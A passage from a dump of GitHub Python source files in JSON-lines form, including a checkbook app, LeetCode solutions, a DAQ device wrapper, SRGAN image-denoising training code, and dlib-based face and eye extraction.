print(f\"Transaction make on {dt.date(transaction_date)} at {dt.time(transaction_date)}\")\n\n # chek for continuation of interface\n responce = pf.continue_transaction_propt()\n if responce:\n continue\n else:\n pf.user_exit()\n break\n\n elif user_input == 3:\n transaction_type_toAdd = \"Deposit\"\n\n # Get deposit amount from user and current balance from file\n user_input = pf.validate_user_input_amount(\"deposit\")\n primary_key, prev_balance, trans_type, transaction_date = pf.view_curr_balance(balance_file_name)\n\n # Adding user input to existing balance\n deposit_amount = user_input + prev_balance\n pf.user_deposit_withdraw(balance_file_name, deposit_amount, primary_key, transaction_type_toAdd)\n print(f\"\\n${float(user_input)} has been added to ${prev_balance}\")\n \n # Retreiving new balance\n primary_key, new_curr_balance, trans_type, transaction_date = pf.view_curr_balance(balance_file_name)\n print(f\"New acount balance: ${new_curr_balance}\")\n print(f\"Transaction make on {dt.date(transaction_date)} at {dt.time(transaction_date)}\")\n\n # chek for continuation of interface\n responce = pf.continue_transaction_propt()\n if responce:\n continue\n else:\n pf.user_exit()\n break\n\n elif user_input == 4:\n pf.user_exit()\n break\n \n\n ","repo_name":"MigashaneVictoire/checkbook_application","sub_path":"bonus_checkbook.py","file_name":"bonus_checkbook.py","file_ext":"py","file_size_in_byte":3785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26891831753","text":"class Produc:\n def __init__(self, name, price):\n self.name = name\n self.price = price\n\n\nclass BonusCard:\n def __init__(self):\n self.products = []\n\n def add_product(self, product):\n self.products.append(product)\n\n def calculate_bonus(self):\n # print(self.products)\n bonus = sum([product.price * 0.05 for product in self.products if product.price >= 10])\n return round(bonus, 2)\n\n\nclass GoldCard(BonusCard):\n def calculate_bonus(self):\n bonus = super().calculate_bonus()\n return round(bonus * 1.5, 2)\n\n\ndef main():\n card_type = input(\"Do you want a bonus card or a gold card (B/G)? \")\n if card_type.upper() == \"B\":\n card = BonusCard()\n else:\n card = GoldCard()\n\n while True:\n action = input(\"What do you want to do: add product, calculate bonus, exit (A/C/E)? \")\n if action.upper() == \"A\":\n product_name = input(\"Enter the product name: \")\n product_price = float(input(\"Enter the price of the product: \"))\n product = Produc(product_name, product_price)\n card.add_product(product)\n elif action.upper() == \"C\":\n print(f\"Your bonus is {card.calculate_bonus()} euros.\")\n elif action.upper() == \"E\":\n break\n else:\n print(\"Invalid action, please try again.\")\n\n\nmain()\n","repo_name":"Nurech/Python_LTAT.03.001","sub_path":"homeworks/05.12/class3.py","file_name":"class3.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22282602874","text":"# Say you have an array prices for which the ith element is the price of a given stock on day i.\n#\n# Design an algorithm to find the maximum profit. You may complete as many transactions as you like (i.e., buy one and sell one share of the stock multiple times).\n\nclass Solution(object):\n def maxProfit(self, prices):\n if not prices or len(prices) == 1:\n return 0\n profit = 0\n for i in range(1, len(prices)):\n if prices[i] > prices[i-1]:\n profit += prices[i] - prices[i-1]\n return profit\n\n\nif __name__ == '__main__':\n print(Solution().maxProfit([7, 1, 5, 3, 6, 4])) # 7\n print(Solution().maxProfit([1, 2, 3, 4, 5])) # 4\n print(Solution().maxProfit([7, 6, 4, 3, 1])) # 0","repo_name":"WestLakeBao/Luyaos-LeetCode-sols-in-Python","sub_path":"122. Best Time to Buy and Sell Stock II.py","file_name":"122. Best Time to Buy and Sell Stock II.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"32213561076","text":"\"\"\"\r\nCreated on Feb 16 2018\r\n\r\n@author: MCC\r\n\"\"\"\r\nfrom ctypes import c_double, c_uint, byref, Array, c_longlong\r\nfrom .daqo_info import DaqoInfo\r\nfrom .ul_c_interface import lib\r\nfrom .ul_exception import ULException\r\nfrom .ul_enums import ScanStatus, WaitType, TriggerType, ScanOption, DaqOutScanFlag\r\nfrom .ul_structs import DaqOutChanDescriptor, TransferStatus\r\n\r\n\r\ndef _daqo_chan_descriptor_array(size, descriptor_list):\r\n chan_descriptor_array = DaqOutChanDescriptor * size # type: type\r\n return chan_descriptor_array(*descriptor_list)\r\n\r\n\r\nclass DaqoDevice:\r\n \"\"\"\r\n An instance of the DaqoDevice class is obtained by calling\r\n :func:`DaqDevice.get_daqo_device`.\r\n \"\"\"\r\n\r\n def __init__(self, handle):\r\n self.__handle = handle\r\n self.__daqo_info = DaqoInfo(handle)\r\n\r\n def get_info(self):\r\n # type: () -> DaqoInfo\r\n \"\"\"\r\n Gets the DAQ output information object for the device\r\n referenced by the :class:`DaqoDevice` object.\r\n\r\n Returns:\r\n DaqoInfo:\r\n\r\n A DaqoInfo object used for retrieving information about the\r\n DAQ output subsystem of the UL DAQ Device.\r\n \"\"\"\r\n return self.__daqo_info\r\n\r\n def daq_out_scan(self, channel_descriptors, samples_per_channel, rate,\r\n options, flags, data):\r\n # type: (list[DaqOutChanDescriptor], int, float, ScanOption, DaqOutScanFlag, Array[float]) -> float\r\n \"\"\"\r\n Outputs values synchronously to multiple output subsystems, such as\r\n analog and digital subsystems, on the device referenced by the\r\n :class:`DaqoDevice` object. This method only works with devices that\r\n support synchronous output.\r\n\r\n Args:\r\n channel_descriptors (list[DaqOutChanDescriptor]): A list of\r\n DaqOutChanDescriptor objects.\r\n samples_per_channel (int): The number of samples per channel to\r\n output.\r\n rate (float): The sample rate in scans per second.\r\n options (ScanOption): One or more attributes (suitable for bit-wise\r\n operations) specifying the optional conditions that will be\r\n applied to the scan, such as continuous or external clock.\r\n flags (DaqOutScanFlag): One or more attributes (suitable for\r\n bit-wise operations) specifying the conditioning applied to the\r\n data.\r\n data (Array[float]): The data buffer to be written. Use\r\n :class:`create_float_buffer` to create the buffer.\r\n\r\n Returns:\r\n float:\r\n\r\n The actual output scan rate.\r\n\r\n Raises:\r\n :class:`ULException`\r\n \"\"\"\r\n sample_rate = c_double(rate)\r\n number_of_channels = len(channel_descriptors)\r\n chan_descriptor_array = _daqo_chan_descriptor_array(number_of_channels,\r\n channel_descriptors)\r\n err = lib.ulDaqOutScan(self.__handle, chan_descriptor_array,\r\n number_of_channels, samples_per_channel,\r\n byref(sample_rate), options, flags, data)\r\n if err != 0:\r\n raise ULException(err)\r\n\r\n return sample_rate.value\r\n\r\n def get_scan_status(self):\r\n # type: () -> tuple[ScanStatus, TransferStatus]\r\n \"\"\"\r\n Gets the current status, count, and index of the synchronous output scan\r\n operation on the device referenced by the :class:`DaqoDevice` object.\r\n\r\n Returns:\r\n ScanStatus, TransferStatus:\r\n\r\n A tuple containing the scan status and transfer status for the\r\n daq input background operation.\r\n\r\n Raises:\r\n :class:`ULException`\r\n \"\"\"\r\n scan_status = c_uint()\r\n transfer_status = TransferStatus()\r\n err = lib.ulDaqOutScanStatus(self.__handle, byref(scan_status),\r\n byref(transfer_status))\r\n if err != 0:\r\n raise ULException(err)\r\n\r\n return ScanStatus(scan_status.value), transfer_status\r\n\r\n def scan_stop(self):\r\n # type: () -> None\r\n \"\"\"\r\n Stops the synchronous output scan operation currently running\r\n on the device referenced by the :class:`DaqoDevice` object.\r\n\r\n Raises:\r\n :class:`ULException`\r\n \"\"\"\r\n err = lib.ulDaqOutScanStop(self.__handle)\r\n if err != 0:\r\n raise ULException(err)\r\n\r\n def scan_wait(self, wait_type, timeout):\r\n # type: (WaitType, float) -> None\r\n \"\"\"\r\n Waits until the scan operation completes on the device referenced by\r\n the :class:`DaqoDevice` object, or the specified timeout elapses.\r\n\r\n Args:\r\n wait_type (WaitType): The wait type.\r\n timeout (float): The timeout value in seconds (s); set to -1 to\r\n wait indefinitely for the scan function to end.\r\n\r\n Raises:\r\n :class:`ULException`\r\n \"\"\"\r\n wait_param = c_longlong(0)\r\n err = lib.ulDaqOutScanWait(self.__handle, wait_type, wait_param,\r\n timeout)\r\n if err != 0:\r\n raise ULException(err)\r\n\r\n def set_trigger(self, trigger_type, trigger_channel, level, variance,\r\n retrigger_sample_count):\r\n # type: (TriggerType, DaqOutChanDescriptor, float, float, int) -> None\r\n \"\"\"\r\n Configures the trigger parameters for the device referenced by the\r\n :class:`DaqoDevice` object that will be used when :func:`daq_out_scan`\r\n is called with the :class:`~ScanOption.RETRIGGER` or\r\n :class:`~ScanOption.EXTTRIGGER` ScanOption.\r\n\r\n Args:\r\n trigger_type (TriggerType): One of the :class:`TriggerType`\r\n attributes that determines the type of the external trigger.\r\n trigger_channel (DaqOutChanDescriptor): The trigger channel.\r\n level (float): The level at or around which the trigger event should\r\n be detected; ignored if trig_type is set to\r\n :class:`~TriggerType.POS_EDGE` :class:`~TriggerType.NEG_EDGE`,\r\n :class:`~TriggerType.HIGH`, :class:`~TriggerType.LOW`,\r\n :class:`~TriggerType.GATE_HIGH`, :class:`~TriggerType.GATE_LOW`,\r\n :class:`~TriggerType.RISING`, or :class:`~TriggerType.FALLING`.\r\n variance (float): The degree to which the input signal can vary\r\n relative to the level parameter; ignored for all types where\r\n level is ignored. For pattern triggering, this argument serves\r\n as the mask value.\r\n retrigger_sample_count (int): The number of samples per trigger to\r\n acquire with each trigger event; ignored unless\r\n :class:`ScanOption.RETRIGGER` is set for the scan.\r\n\r\n Raises:\r\n :class:`ULException`\r\n \"\"\"\r\n trig_level = c_double(level)\r\n trig_variance = c_double(variance)\r\n\r\n err = lib.ulDaqOutSetTrigger(self.__handle, trigger_type,\r\n trigger_channel, trig_level, trig_variance,\r\n retrigger_sample_count)\r\n if err != 0:\r\n raise ULException(err)\r\n","repo_name":"hunterschone/ProControl","sub_path":"task_presentation/fMRI/move_see_design/uldaq/daqo_device.py","file_name":"daqo_device.py","file_ext":"py","file_size_in_byte":7362,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"74313124969","text":"#!/usr/bin/python3\n\"\"\"a module that defines a class Square\"\"\"\n\n\nclass Square:\n \"\"\"a class that defines a square by based on 1-square.py\n private instanve attribure size\n with out any module\"\"\"\n def __init__(self, size=0, position=(0, 0)):\n \"\"\"size must be an integer, otherwise raise a TypeError\n exception with the message size must be an integer\n if size is less than 0, raise a ValueError exception\n with the message size must be >= 0\n \"\"\"\n self._Square__size = size\n self._Square__position = position\n if type(size) is not int:\n raise TypeError(\"size must be an integer\")\n elif (size < 0):\n raise ValueError(\"size must be >= 0\")\n elif (not(isinstance(position, tuple)) or len(position) is not 2):\n raise TypeError(\"position must be a tuple of 2 positive integers\")\n elif (type(position[0]) != int or type([position[1] != int])):\n raise TypeError(\"position must be a tuple of 2 positive integers\")\n elif (position[0] < 0 or position[1] < 0):\n raise TypeError(\"position must be a tuple of 2 positive integers\")\n\n @property\n def size(self):\n \"\"\"getter to get the value of size\"\"\"\n return self._Square__size\n\n @size.setter\n def size(self, value):\n \"\"\"setter to change the value os size into value\"\"\"\n if type(value) is not int:\n raise TypeError(\"size must be an integer\")\n if (value < 0):\n raise ValueError(\"size must be >= 0\")\n self._Square__size = value\n\n @property\n def position(self):\n \"\"\"getter to get the value of position\"\"\"\n return self._Square__position\n\n @position.setter\n def position(self, value):\n \"\"\"setter to set the value position\"\"\"\n if (value[0] or value[1] is not int or value[0] or value[1] < 0):\n raise TypeError(\"position must be a tuple of 2 positive integers\")\n self._Square__position = value\n\n def area(self):\n \"\"\"function to calculate the area of the square\"\"\"\n return (self._Square__size * self._Square__size)\n\n def my_print(self):\n \"\"\"function that prints in stdout the square with the character #\"\"\"\n if self._Square__size is 0:\n print(\"\")\n else:\n for x in range(self._Square__size):\n for y in range(self._Square__size):\n for a in range(self._Square__position[0]):\n if y is not 0:\n break\n print(\"_\", end=\"\")\n print(\"#\", end=\"\")\n print(\"\\n\", end=\"\")\n","repo_name":"IyasuH/alx-higher_level_programming","sub_path":"0x06-python-classes/6-square.py","file_name":"6-square.py","file_ext":"py","file_size_in_byte":2667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74157867048","text":"# Based on: https://medium.com/analytics-vidhya/implementing-srresnet-srgan-super-resolution-with-tensorflow-89900d2ec9b2\n# Paper: https://arxiv.org/pdf/1609.04802.pdf (SRGAN)\n# Pytorch Impl: https://github.com/Lornatang/SRGAN-PyTorch/blob/main/model.py\n\nimport os\nimport tensorflow as tf\nimport keras\nimport model_builder\nimport metrics\nimport RESNET\nimport train\nimport shutil\nimport pathlib\nimport basics \n\n# === SRGAN ===\ndef _get_spatial_ndim(x):\n return keras.backend.ndim(x) - 2\n\ndef _get_num_channels(x):\n return keras.backend.int_shape(x)[-1]\n\ndef _conv(x, num_filters, kernel_size, padding='same', **kwargs):\n n = _get_spatial_ndim(x)\n if n not in (2, 3):\n raise NotImplementedError(f'{n}D convolution is not supported')\n\n return (keras.layers.Conv2D if n == 2 else\n keras.layers.Conv3D)(\n num_filters, kernel_size, padding=padding, **kwargs)(x)\n\ndef _residual_blocks(x, repeat):\n num_channels = _get_num_channels(x)\n\n for _ in range(repeat):\n short_skip = x\n x = _conv(x,num_channels,3)\n x = keras.layers.BatchNormalization()(x)\n x = keras.layers.PReLU()(x)\n x = _conv(x,num_channels,3)\n x = keras.layers.BatchNormalization()(x)\n x = keras.layers.Add()([x, short_skip])\n return x\n\ndef _residual_disc_blocks(x):\n num_channels = _get_num_channels(x)\n channels = [num_channels * n for n in range(1,5)]\n print(channels)\n\n x = _conv(x,num_channels,3,strides = 2)\n x = keras.layers.BatchNormalization()(x)\n x = keras.layers.LeakyReLU()(x)\n \n for i in range(len(channels)):\n x = _conv(x,channels[i],3,strides = 1)\n x = keras.layers.BatchNormalization()(x)\n x = keras.layers.LeakyReLU()(x)\n x = _conv(x,channels[i],3,strides = 2)\n x = keras.layers.BatchNormalization()(x)\n x = keras.layers.LeakyReLU()(x)\n return x\n\n# Build a discriminator model\ndef build_discriminator_model(input_shape = (50,256,256,1),\n *,\n num_channels,\n num_residual_blocks,\n num_channel_out =1):\n print('=== Building Discriminator Model --------------------------------------------')\n inputs = keras.layers.Input(input_shape)\n x = _conv(inputs, num_channels, 3)\n x = keras.layers.LeakyReLU()(x)\n \n \n x = _residual_disc_blocks(x)\n x = keras.layers.Flatten()(x)\n x = keras.layers.Dense(1024)(x)\n x = keras.layers.LeakyReLU()(x)\n outputs = keras.layers.Dense(1,activation='sigmoid')(x)\n\n model = keras.Model(inputs,outputs,name='Discriminator')\n print('--------------------------------------------------------------------')\n\n return model\n\ndef build_and_compile_srgan(config):\n learning_rate = config['initial_learning_rate']\n generator = RESNET.build_generator_model((*config['input_shape'], 1),\n num_channels=config['num_channels'],\n num_residual_blocks=config['num_residual_blocks'],\n num_channel_out = 1)\n \n generator = model_builder.compile_model(generator, learning_rate, config['loss'], config['metrics'],0,\n config['ssim_FSize'],config['ssim_FSig'])\n \n discriminator = build_discriminator_model((*config['input_shape'], 1),\n num_channels=config['num_channels'],\n num_residual_blocks=config['num_residual_blocks'],\n num_channel_out =1)\n discriminator.summary()\n\n return generator, discriminator\n\ndef SRGAN_fit_model(model_name, strategy, config, initial_path, output_dir,training_data, validation_data):\n generator, discriminator, care = model_builder.build_and_compile_model(model_name, strategy, config)\n Gen_flag, CARE_flag = basics.SRGAN_Weight_search(pathlib.Path(output_dir))\n if Gen_flag == 1:\n Gen_final_weights_path = str(pathlib.Path(output_dir) / 'Pretrained.hdf5')\n else: \n generator, Gen_final_weights_path = generator_train(generator, model_name, config, output_dir, training_data, validation_data)\n generator.load_weights(Gen_final_weights_path)\n if CARE_flag == 1:\n CARE_final_weights_path = str(pathlib.Path(output_dir) / 'CARE_Pretrained.hdf5')\n else: \n if os.path.exists((initial_path + '/Denoising2PImages/' + 'CARE_Pretrained.hdf5')):\n CARE_final_weights_path = (initial_path + '/Denoising2PImages/' + 'CARE_Pretrained.hdf5')\n print(f'CARE Pretrained weights found in GitLab Repository path :{CARE_final_weights_path}')\n else:\n raise Exception('CARE Model needs to be pretrained, please confirm you have weights for standard CARE model')\n care.load_weights(CARE_final_weights_path)\n\n srgan_checkpoint_dir = str(pathlib.Path(output_dir) / 'ckpt' / 'srgan')\n print(f'Checkpoints saved in {srgan_checkpoint_dir}')\n os.makedirs(srgan_checkpoint_dir, exist_ok=True)\n with strategy.scope(): \n learning_rate=tf.keras.optimizers.schedules.PiecewiseConstantDecay(boundaries=[100000], values=[1e-4, 1e-5])\n generator_optimizer = tf.keras.optimizers.Adam(learning_rate=learning_rate)\n discriminator_optimizer = tf.keras.optimizers.Adam(learning_rate=learning_rate) \n\n srgan_checkpoint = tf.train.Checkpoint(psnr=tf.Variable(0.0),\n ssim=tf.Variable(0.0), \n generator_optimizer=generator_optimizer,\n discriminator_optimizer=discriminator_optimizer,\n generator=generator,\n discriminator=discriminator)\n\n srgan_checkpoint_manager = tf.train.CheckpointManager(checkpoint=srgan_checkpoint,\n directory=srgan_checkpoint_dir,\n max_to_keep=3)\n \n if srgan_checkpoint_manager.latest_checkpoint:\n srgan_checkpoint.restore(srgan_checkpoint_manager.latest_checkpoint)\n perceptual_loss_metric = tf.keras.metrics.Mean()\n discriminator_loss_metric = tf.keras.metrics.Mean()\n psnr_metric = tf.keras.metrics.Mean()\n ssim_metric = tf.keras.metrics.Mean()\n best_val_ssim = None\n for i in range(config['epochs']):\n for _, batch in enumerate(training_data):\n perceptual_loss, discriminator_loss = strategy.run(train_step, args=(batch,srgan_checkpoint,care))\n perceptual_loss_metric(perceptual_loss)\n discriminator_loss_metric(discriminator_loss)\n lr = batch[0]\n hr = batch[1]\n sr = srgan_checkpoint.generator.predict(lr)\n psnr_value = metrics.psnr(hr, sr)\n hr = tf.cast(hr,tf.double)\n sr = tf.cast(sr,tf.double)\n ssim_value = metrics.ssim(hr, sr)\n psnr_metric(psnr_value)\n ssim_metric(ssim_value)\n CARE_loss = perceptual_loss_metric.result()\n dis_loss = discriminator_loss_metric.result()\n psnr_train = psnr_metric.result()\n ssim_train = ssim_metric.result()\n print(f'Training --> Epoch # {i}: CARE_loss = {CARE_loss:.4f}, Discrim_loss = {dis_loss:.4f}, PSNR = {psnr_train:.4f}, SSIM = {ssim_train:.4f}')\n perceptual_loss_metric.reset_states()\n discriminator_loss_metric.reset_states()\n psnr_metric.reset_states()\n ssim_metric.reset_states()\n\n srgan_checkpoint.psnr.assign(psnr_train)\n srgan_checkpoint.ssim.assign(ssim_train)\n\n\n for _, val_batch in enumerate(validation_data):\n lr = val_batch[0]\n hr = val_batch[1]\n sr = srgan_checkpoint.generator.predict(lr)\n hr_output = srgan_checkpoint.discriminator.predict(hr)\n sr_output = srgan_checkpoint.discriminator.predict(sr)\n\n con_loss = metrics.calculate_content_loss(hr, sr, care)\n gen_loss = metrics.calculate_generator_loss(sr_output)/len(sr_output)\n perc_loss = con_loss + 0.001 * gen_loss\n disc_loss = metrics.calculate_discriminator_loss(hr_output, sr_output)/len(sr_output)\n\n perceptual_loss_metric(perc_loss)\n discriminator_loss_metric(disc_loss)\n\n psnr_value = metrics.psnr(hr, sr)\n hr = tf.cast(hr,tf.double)\n sr = tf.cast(sr,tf.double)\n ssim_value = metrics.ssim(hr, sr)\n psnr_metric(psnr_value)\n ssim_metric(ssim_value)\n CARE_loss = perceptual_loss_metric.result()\n dis_loss = discriminator_loss_metric.result()\n total_ssim = ssim_metric.result()\n psnr_train = psnr_metric.result()\n ssim_train = ssim_metric.result()\n if best_val_ssim == None or total_ssim > best_val_ssim:\n print('New Checkpoint Saved')\n srgan_checkpoint_manager.save()\n best_val_ssim = total_ssim\n print(f'Validation --> Epoch # {i}: CARE_loss = {CARE_loss:.4f}, Discrim_loss = {dis_loss:.4f}, PSNR = {psnr_train:.4f}, SSIM = {ssim_train:.4f}')\n perceptual_loss_metric.reset_states()\n discriminator_loss_metric.reset_states()\n psnr_metric.reset_states()\n ssim_metric.reset_states()\n return srgan_checkpoint, srgan_checkpoint_manager\nlearning_rate=tf.keras.optimizers.schedules.PiecewiseConstantDecay(boundaries=[100000], values=[1e-4, 1e-5])\ngenerator_optimizer = tf.keras.optimizers.Adam(learning_rate=learning_rate)\ndiscriminator_optimizer = tf.keras.optimizers.Adam(learning_rate=learning_rate) \n\n@tf.function\ndef train_step(images,srgan_checkpoint,CARE):\n with tf.GradientTape() as gen_tape, tf.GradientTape() as disc_tape:\n lr = images[0]\n hr = images[1]\n sr = srgan_checkpoint.generator(lr, training=True)\n hr_output = srgan_checkpoint.discriminator(hr, training=True)\n sr_output = srgan_checkpoint.discriminator(sr, training=True)\n\n con_loss = metrics.calculate_content_loss(hr, sr, CARE)\n gen_loss = metrics.calculate_generator_loss(sr_output)/len(sr_output)\n perc_loss = con_loss + 0.001 * gen_loss\n disc_loss = metrics.calculate_discriminator_loss(hr_output, sr_output)/len(sr_output)\n\n gradients_of_generator = gen_tape.gradient(perc_loss, srgan_checkpoint.generator.trainable_variables)\n gradients_of_discriminator = disc_tape.gradient(disc_loss, srgan_checkpoint.discriminator.trainable_variables)\n\n generator_optimizer.apply_gradients(zip(gradients_of_generator, srgan_checkpoint.generator.trainable_variables))\n discriminator_optimizer.apply_gradients(zip(gradients_of_discriminator, srgan_checkpoint.discriminator.trainable_variables))\n\n return perc_loss, disc_loss\n\ndef generator_train(generator, model_name, config, output_dir, training_data, validation_data):\n generator = train.fit_model(generator, model_name, config, output_dir,training_data, validation_data)\n os.chdir(pathlib.Path(output_dir))\n model_paths = [model_path for model_path in os.listdir() if model_path.endswith(\".hdf5\") ]\n assert len(model_paths) != 0, f'No models found under {output_dir}'\n latest = max(model_paths, key=os.path.getmtime)\n final_weights_path = str(pathlib.Path(output_dir) / 'Pretrained.hdf5')\n source = str(pathlib.Path(output_dir) / latest)\n print(f'Location of source file: \"{source}\"')\n print(f'Location of Final Weights file: \"{final_weights_path}\"')\n shutil.copy(source, final_weights_path)\n print(f'Pretrained Weights are saved to: \"{final_weights_path}\"')\n\n return generator, final_weights_path","repo_name":"Tufts-University/Denoising2PImages","sub_path":"srgan.py","file_name":"srgan.py","file_ext":"py","file_size_in_byte":11700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13300891886","text":"# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution:\n def maxDepth(self, root: TreeNode) -> int:\n if(root is None):\n return 0\n if(root.left is None and root.right is None):\n return 1\n \n left = self.maxDepth(root.left)\n right = self.maxDepth(root.right)\n\n return max(left,right)+1\n\n# another approach \n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def maxDepth(self, root: Optional[TreeNode]) -> int:\n # # (1) recursive\n # def find_max(node):\n # if not node: return 0\n # left = 1 + find_max(node.left)\n # right = 1 + find_max(node.right)\n\n # return max(left,right)\n # return find_max(root)\n\n #(2) iterative\n if not root: return 0\n\n stack = [(root,1)]\n res = 0\n\n while stack:\n node, depth = stack.pop()\n if node:\n res = max(res,depth)\n stack.append((node.left,depth + 1))\n stack.append((node.right,depth + 1))\n return res\n\n\n","repo_name":"oumburs9/Competitive-Programming","sub_path":"Leet Code Problems/Easy problems/#104 Maximum Depth of Binary Tree - Easy.py","file_name":"#104 Maximum Depth of Binary Tree - Easy.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21453875745","text":"import unittest\nfrom solution import Solution\n\nclass Test(unittest.TestCase):\n\n def setUp(self) -> None:\n self.s = Solution()\n\n def test1(self):\n piles = [3,6,7,11]\n h = 8\n self.assertEqual(self.s.minEatingSpeed(piles, 8), 4)\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"jerrt2003/leetcode-in-python","sub_path":"875_Koko_Eating_Bananas/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23705317036","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport cv2\r\nimport random\r\n\r\nDATADIR = r\"C:\\Users\\Fleford Redoloza\\PycharmProjects\\TensorFlowPractice\\kagglecatsanddogs_3367a\\PetImages\"\r\n\r\nCATEGORIES = [\"Dog\", \"Cat\"]\r\n\r\nimg_size = 100\r\n\r\n# for category in CATEGORIES: # do dogs and cats\r\n# path = os.path.join(DATADIR, category) # create path to dogs and cats\r\n# for img in os.listdir(path): # iterate over each image per dogs and cats\r\n# img_array = cv2.imread(os.path.join(path, img), cv2.IMREAD_GRAYSCALE) # convert to array\r\n# plt.imshow(img_array, cmap='gray') # graph it\r\n# plt.show() # display!\r\n#\r\n# img_size = 100\r\n#\r\n# new_array = cv2.resize(img_array, (img_size, img_size))\r\n# plt.imshow(new_array, cmap='gray')\r\n# plt.show()\r\n#\r\n# break # we just want one for now so break\r\n#\r\n# break # ...and one more!\r\n\r\n\r\ntraining_data = []\r\n\r\n\r\ndef create_training_data():\r\n for category in CATEGORIES: # do dogs and cats\r\n path = os.path.join(DATADIR, category) # create path to dogs and cats\r\n class_num = CATEGORIES.index(category)\r\n for img in os.listdir(path): # iterate over each image per dogs and cats\r\n try:\r\n img_array = cv2.imread(os.path.join(path, img), cv2.IMREAD_GRAYSCALE) # convert to array\r\n new_array = cv2.resize(img_array, (img_size, img_size)) # resize image array\r\n training_data.append([new_array, class_num])\r\n except Exception as e:\r\n pass\r\n\r\ncreate_training_data()\r\nrandom.shuffle(training_data)\r\nprint(len(training_data))\r\n\r\nfor sample in training_data[:10]:\r\n print(sample[1])\r\n\r\nX = []\r\nY = []\r\n\r\nfor features, label in training_data:\r\n X.append(features)\r\n Y.append(label)\r\n","repo_name":"Fleford/TensorFlowPractice","sub_path":"DogCatCNN.py","file_name":"DogCatCNN.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38649028240","text":"import numpy as np\nimport cv2\nimport argparse\nimport dlib\n\nFACIAL_LANDMARKS_IDs ={\n\t\"mouth\":(48, 68),\n\t\"right_eyebrow\": (17, 22),\n\t\"left_eyebrow\": (22, 27),\n\t\"right_eye\":(36, 42),\n\t\"left_eye\": (42, 48),\n\t\"nose\": (27, 35)}\n\nRIGHT_EYE_IDs = FACIAL_LANDMARKS_IDs[\"right_eye\"]\nLEFT_EYE_IDs = FACIAL_LANDMARKS_IDs[\"left_eye\"]\n\n# initialize dlib face detector (HOG-based) and then create the facial landmark predictor\ndef predict_face_rectangle(image):\n\tdetector = dlib.get_frontal_face_detector()\n\tgray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\tface_rectangle = detector(gray_image, 1)\n\treturn face_rectangle\n\n\n#Rectangle to bounding box\n#convert a box, which was predicted by dlib to the format (x,y,width,height)\n\n\ndef rectangle_to_box(box):\n\n\tx = box[0][0]\n\ty = box[0][1]\n\twidth = box[1][0]-x\n\theight = box[1][1]-y\n\treturn (x,y,width,height)\n\n\ndef shape_to_np(shape):\n\t#list of x,y coordinates\n\txy = np.zeros((68,2),dtype=\"int\")\n\t#loop over the 68 facial landmarks and convert them to a tuple x,y coordinates\n\tfor i in range (0,68):\n\t\txy[i]=(shape.part(i).x,shape.part(i).y)\n\treturn xy\n\n#downscaling an image with preserved height to width ratio.\n#resizing an image means changing the dimension of it. cv2 image It returns a tuple of number of rows, columns and channels (if image is color).If image is grayscale, tuple returned contains only number of rows and columns. So it is a good method to check if loaded image is grayscale or color image.\ndef downscale(img,scale_percent):\n\twidth=int(img.shape[1]*scale_percent/100)\n\theight=int(img.shape[0]*scale_percent/100)\n\tdim=(width,height)\n\tresized=cv2.resize(img,dim,interpolation = cv2.INTER_AREA)\n\treturn resized\n\n\ndef upscale(img,factor):\n\twidth = int(img.shape[1]*factor)\n\theight = int(img.shape[0]*factor)\n\tdim = (width, height)\n\tresized = cv2.resize(img, dim, interpolation=cv2.INTER_AREA)\n\treturn resized\n\n\ndef predict_face_shape(image, face_rectangle, shape_predictor):\n\t#load the shape predictor model\n\tpredictor=dlib.shape_predictor(shape_predictor)\n\tgray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\t#for each face detected\n\tfor (i, rect) in enumerate(face_rectangle):\n\t\t#determine face landmarks in gray image\n\t\tshape = predictor(gray_image,rect)\n\t\t#convert to numpy array\n\t\tshape=[(int(s.x), int(s.y)) for s in shape.parts()]\n\treturn shape\n\n\ndef extract_face (image, face_rectangle):\n\n\t(x,y,w,h) = rectangle_to_box(face_rectangle)\n\tface = image[y:y+h, x:x+w]\n\treturn face\n\n\ndef extract_eye(eyeID, shape, image):\n\tif shape is None:\n\t\treturn None\n\t(i,j)=eyeID\n\tmagic = 5\n\n\t(x, y, w, h) = cv2.boundingRect(np.array([shape[i:j]]))\n\n\treturn x-magic, y-magic, cv2.medianBlur(image[y-5: y+5+h, x-5: x+5+w], 5) # image[y-magic: y+5+magic, x-magic: x+magic+w] # cv2.bilateralFilter(image[y-magic: y+5+magic, x-magic: x+magic+w], 5, 20, 20) #\n\ndef circle_detection(img, dp, minDist, par1=100, par2=100, minr=0, maxr=0):\n\n\t# detect circles in the image\n\tcircles = cv2.HoughCircles(img, cv2.HOUGH_GRADIENT, dp=dp, minDist=minDist, param1=par1, param2=par2, minRadius=minr, maxRadius=maxr)\n\n\t# ensure at least some circles were found\n\tif circles is not None:\n\t\t# convert the (x, y) coordinates and radius of the circles to integers\n\t\tcircles = np.round(circles[0, :]).astype(\"int\")\n\t\tcircle_xyrs = []\n\t\t# loop over the (x, y) coordinates and radius of the 